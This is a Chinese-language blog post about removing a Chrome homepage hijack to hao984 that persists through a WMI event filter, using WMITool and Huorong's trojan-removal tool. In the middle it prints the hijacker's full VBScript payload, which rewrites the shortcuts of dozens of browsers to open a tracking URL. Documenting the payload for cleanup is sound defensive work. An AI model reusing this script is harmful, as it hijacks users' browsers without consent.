最近应该是装了什么软件,Chrome的主页被劫持修改为了hao984,通过常规的方法无法解决,发现现在的人真的是挖空心思来搞这些名堂。
手段越来越深入,不通过专用工具还真的无法解决。
具体解决步骤如下:
第一步:使用WMITool删除
安装后打开WMI event viewer(下载地址:https://www.pc18.com/soft/15730.html),点击左上角register for events,弹出Connect to namespace框,填入“root\CIMV2”,确定
在左侧的“_EventFilter”后选中后右击,将其删除即可。
当然也选择view instant properties,查看调用代码的具体内容
On Error Resume Next:Const link = "http://hao984.com/?r=xlpjgstdnmxx&m=v1":Const link360 = "http://hao984.com/?r=xlpjgstdnmxx&m=v1&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:
第二步:使用火绒恶意木马专杀工具清理(很关键)
火绒恶意木马专杀工具更新,解决首页劫持类等病毒
http://bbs.huorong.cn/thread-18575-1-1.html
http://huorong.cn/person5.html
C:\Windows\guardapi.dll
C:\Windows\hnbjwxlsr.sys
最后重启一下电脑即可解决问题。
相关文章:
利用WMITool解决浏览器主页被hao123劫持问题
http://www.rootop.org/pages/3741.html
https://www.cnblogs.com/yiven/p/9290140.html